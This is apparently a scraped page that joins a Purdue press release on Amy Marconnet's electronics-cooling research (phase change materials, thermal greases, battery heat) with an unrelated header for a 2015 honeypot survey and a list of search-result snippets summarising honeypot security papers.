Amy Marconnet, professor of mechanical engineering, uses an infrared camera in her lab at Birck Nanotechnology Center at Purdue. Her research looks into new methods to manage and reduce the heat produced inside many of today’s electronics. (Purdue University photo/Greta Bell)

WEST LAFAYETTE, Ind. — Keeping today’s electronics cool isn’t as easy as running a fan installed at the rear of a desktop computer. Using anything from a smartphone to an electric vehicle results in some manner of heat production that eventually leads to the deterioration of the device.

Amy Marconnet, professor of mechanical engineering at Purdue University, is researching today’s wide range of technology to develop electronics cooling and thermal management techniques focusing on reducing the heat that’s produced, potentially resulting in improved device power and usage.

Electronics have a narrow temperature range where they can function efficiently. In an ever-evolving era of technology, there are a variety of ways to keep devices cool, even at a nanoscale level.

“On the semiconductor side, we’re mainly looking at improving thermal management to let electronics run at higher powers,” Marconnet said. “With wearable electronics, there’s tighter temperature controls required because it’s directly in contact with people at all times or when it’s in use and getting hot.”

That requirement has resulted in researching materials that can better transfer the heat in a system away from where it is building up without adding additional weight or manufacturing costs to the device.

Marconnet said phase change materials are one option her research is delving into. The materials provide thermal management by absorbing or releasing heat during the transition between melting or solidifying, depending upon the conditions. They also are being researched for the power electronics in electric vehicles.

“So, you can have the materials be melting while you’re, say, using your VR (virtual reality) goggles,” she said. “And then when you’re recharging your goggles or overnight, they will solidify, and you can use the device with higher intensity the next day.”

By melting, the phase change materials absorb the heat being produced, while solidifying again releases the heat. Marconnet recently researched using a metallic alloy as a phase change material within a chip to keep the system compact, yet effective. This work was spearheaded by Marconnet’s graduate student Meghavin Bhatasana.

Marconnet’s work receives funding from a consortium of companies as part of the Cooling Technologies Research Center at Purdue. She has published previous papers on thermal greases, a pastelike material that is put between a silicon chip and the heat-spreading components in the system.

Thermal greases eventually are “pumped out” of the area between the chips and other components, causing a device like a computer to drop in performance.

“We’re trying to figure out a fast test method right now for identifying which materials will perform well and which will perform poorly without having to wait for a year or more of an actual use of the system,” Marconnet said.

Thermal management also examines the part batteries play in heat buildup, especially as the demand increases for faster charges, particularly in electric vehicles.

Marconnet compared heat buildup from charging a device battery to the light from an incandescent light bulb. While you get useful light from the bulb, it also gets hot. When charging a battery, you also get useful power, but heat is generated by the battery’s electrochemical reactions. So, while some of the power is being used for the chemical reactions that charge the battery, another portion of the power just gets wasted as heat in the device.

Marconnet and Xiulin Ruan , a professor in the School of Mechanical Engineering , already have worked to extend the life of devices by creating a compressible foam that can spread out heat building up as well as offer insulation against colder temperatures. The Purdue Innovates Office of Technology Commercialization has filed a patent application for it.

Two new papers regarding Marconnet’s work on phase change materials have been submitted and are under review.

Purdue is a national leader in research and education involving microelectronics materials, devices, chip design, tool development, manufacturing, packaging and sustainability, spanning the semiconductor ecosystem in software and hardware with long-standing faculty excellence. Strategic initiatives — such as the first comprehensive, large-scale Semiconductor Degrees Program , announced by Purdue in 2022 — are intended to prepare the next generation of semiconductor industry workers, a cornerstone for advancing the field.

About Purdue University

Purdue University is a public research institution demonstrating excellence at scale. Ranked among top 10 public universities and with two colleges in the top four in the United States, Purdue discovers and disseminates knowledge with a quality and at a scale second to none. More than 105,000 students study at Purdue across modalities and locations, including nearly 50,000 in person on the West Lafayette campus. Committed to affordability and accessibility, Purdue’s main campus has frozen tuition 13 years in a row. See how Purdue never stops in the persistent pursuit of the next giant leap — including its first comprehensive urban campus in Indianapolis, the Mitch Daniels School of Business, Purdue Computes and the One Health initiative — at https://www.purdue.edu/president/strategic-initiatives .

Experimental Investigation of Composite Phase Change Material Heat Sinks for Enhanced Passive Thermal Management ASME Journal of Heat and Mass Transfer DOI: https://doi.org/10.1115/1.4048620

Machine-learning assisted optimization strategies for phase change materials embedded within electronic packages Applied Thermal Engineering DOI: https://doi.org/10.1016/j.applthermaleng.2021.117384

Optimization of an Embedded Phase Change Material Cooling Strategy Using Machine Learning 2021 20th IEEE Intersociety Conference on Thermal and Thermomechanical Phenomena in Electronic Systems (iTherm) DOI: https://doi.org/10.1109/ITherm51669.2021.9503128

Media contact: Brian Huchel


A survey of honeypot research: Trends and opportunities

  • December 2015
  • Conference: 2015 10th International Conference for Internet Technology and Secured Transactions (ICITST)
  • Authors: Keshnee Padayachee and Themba Masombuka, University of South Africa



COMMENTS

  1. (PDF) Honeypot in network security: A survey

    In this paper we present an overview of honeypots and provide a starting point for persons who are interested in this technology. We examine different kinds of honeypots, honeypot concepts, and ...

  2. An Analysis of Honeypots and their Impact as a Cyber Deception Tactic

    Daniel Zielinski, Hisham A. Kholidy. State University of New York (SUNY) Polytechnic Institute, College of Engineering, Network and Computer Security Department, Utica, NY USA. [email protected], [email protected]. Abstract— This paper explores deploying a cyber honeypot system to learn how cyber defenders can use a honeypot ...

  3. A comprehensive survey on cyber deception techniques to improve

    This paper presents the research work conducted in the past 15 years on honeypots and their deception techniques. Several surveys exist in this field; among them are the recent researches performed by Fraunholz et al. (2018), Razali et al. (2018), Zobal et al. (2019), Seungjin et al. (2020), and Lackner (2021).

  4. Containerized cloud-based honeypot deception for tracking attackers

    The IP reputation lookup from WhatIsMyIPAddress and DNSChecker designates DigitalOcean-ASN ISP 157.230.64.246 as malicious as it reported spam score of 508.4 [49]. The IP 47.101.147.143 from the ...

  5. (PDF) Analysis and Implementation of Honeypot Framework ...

    Analysis and Implementation of Honeypot Framework for Enhancing Network Security. May 2023. Conference: 1st International Conference on Computing Technologies, Tools and Applications (ICTAPP-23 ...

  6. Current State of Honeypots and Deception Strategies in Cybersecurity

    This article surveys honeypot problematics and deception-based defensive strategies in the cyberworld. First, we define the honeypot phenomenon and summarize its advantages and disadvantages, as well as legal and ethical issues. We classify honeypots into different categories and present examples of both actively developed honeypots and ones that had a significant impact. Finally, we discuss ...

  7. A Survey of Honeypots and Honeynets for Internet of Things, Industrial

    This paper provides a comprehensive survey of the research that has been carried out on honeypots and honeynets for IoT, IIoT, and CPS. It provides a taxonomy and extensive analysis of the existing honeypots and honeynets, states key design factors for the state-of-the-art honeypot/honeynet research and outlines open issues for future

  8. Approaches for Preventing Honeypot Detection and Compromise

    Honeypots have been used extensively for over two decades. However, their development is rarely accompanied with an understanding of how attackers are able to detect them. Further, our understanding of effective evasion strategies that prevent the detection of honeypots is limited. We present a classification of honeypot characteristics as well as honeypot detection evasion strategies which ...

  9. New framework for adaptive and agile honeypots

    Technology and malware as well as honeypot development have since evolved. The heterogeneous nature of new devices coupled with emerging attack vectors affects the relevance of this taxonomy and is explored in Section 3. Further research has classified honeypot operations and has proposed a taxonomy to gain insight into honeynet architecture .

  10. A survey of honeypot research: Trends and opportunities

    The number of devices connected to computer networks is increasing daily, and so is the number of network-based attacks. A honeypot is a system trap that is set to act against unauthorised use of information systems. The objective of this study was to survey the emergent trends in extant honeypot research with the aims of contributing to the knowledge gaps in the honeypot environment. The ...

  11. (PDF) An Overview of Honeypot Systems

    Characteristics of Honeypot Systems: 1) Honeypot plays a significant role in preventing the attacks and malicious activities. 2) It improves the attack detection time, response time [4]. 3) It ...

  12. Honeypots and Its Deployment: A Review

    Deployment of a honeypot system on a network is a proactive measure that enables an immediate detection of an intrusion before any data is damaged or stolen. This paper is organized in four sections. After the introduction to the need for security in Sect. 1, Sect. 2 describes the review of literature of the honeypot technology.

  13. Research on Network Defense Strategy Based on Honey Pot Technology

    honeypot system Value, it is unknown intrusion attacks can't do anything. 3. The core technology of honeypots Honeypot as a member of an intrusion detection system, in the entire defense system is mainly used in the network spoofing technology, based on the data to capture information, and control intruder access and other technologies.

  14. Honeypots for Cybercrime Research

    Abstract. Honeypots are a type of cybersecurity tool designed with the general purpose of being attacked and compromised by cyberthreats. They became widely popularized throughout the 1990s by computer scientists due to their multi-functional capabilities. As a result, a wide variety of honeypots have been introduced to handle different ...

  15. NeuralPot: An Industrial Honeypot Implementation Based On Deep Neural

    Honeypots are powerful security tools, developed to shield commercial and industrial networks from malicious activity. Honeypots act as passive and interactive decoys in a network attracting malicious activity and securing the rest of the network entities. Since an increase in intrusions has been observed lately, more advanced security systems are necessary. In this paper a new method of ...

  16. Honeypot Technology Research and Application

    Honeypot technology has won the sustained attention of the security community to make considerable progress and get wide application, and has become one of the main technical means of the Internet security threat monitoring and analysis. Honeypot is a proactive defense technology, introduced by the defense side to change the asymmetric situation of a network attack and defensive game. Through ...

  17. A Survey: Recent Advances and Future Trends in Honeypot Research

    Abstract and Figures. This paper presents a survey on recent advances in honeypot research from a review of 80+ papers on honeypots and related topics mostly published after year 2005. This paper ...

  18. PDF The Evolution of Honeypot Technologies and Future Directions

    International Research Journal of Modernization in Engineering Technology and Science (Peer-Reviewed, Open Access, Fully Refereed International Journal) ... The paper will give a diagram of honeypot technologies, their reason, and their advancement over time. It'll moreover clarify the noteworthiness of

  19. Honeypot-based intrusion detection system: A performance analysis

    "Honeypot is the proactive defense technology, in which resources placed in a network with the aim to observe and capture new attacks". This paper proposes a honeypot-based model for intrusion detection system (IDS) to obtain the best useful data about the attacker. The ability and the limitations of Honeypots were tested and aspects of it ...

  20. Honeypots: Concepts, Approaches and Challenges

    A honeypot's classification is based on its purpose which are honeytokens, production and research as well as their interaction level and those are low, medium and high. 1.1 The purpose of honeypots 1.1.1 Research honeypots A research honeypot does not add anything of value to any

  21. (PDF) A Survey on Potential Applications of Honeypot Technology in

    Recently, honeypot systems are anymore used in connection with intrusion detection systems. So this paper describes possible implementation of honeypot technologies combined with IDS/IPS in a network.

  22. New research focuses on keeping today's hottest electronics cool for

    Two new papers regarding Marconnet's work on phase change materials have been submitted and are under review. Purdue is a national leader in research and education involving microelectronics materials, devices, chip design, tool development, manufacturing, packaging and sustainability, spanning the semiconductor ecosystem in software and ...

  23. A survey of honeypot research: Trends and opportunities

    A honeypot is a system trap that is set to act against unauthorised use of information systems. The objective of this study was to survey the emergent trends in extant honeypot research with the ...

  24. Mimic Honeypot Design and Analysis

    Aiming at the problem that high-interaction honeypots face great risks, this paper integrates honeypot technology and mimic defense technology, proposes a honeypot model based on mimic defense named a mimic honeypot, and studies the theoretical basis, the core idea, and the built environment. Finally, the anti-attack ability of the mimic honeypot is theoretically analyzed, and the results show ...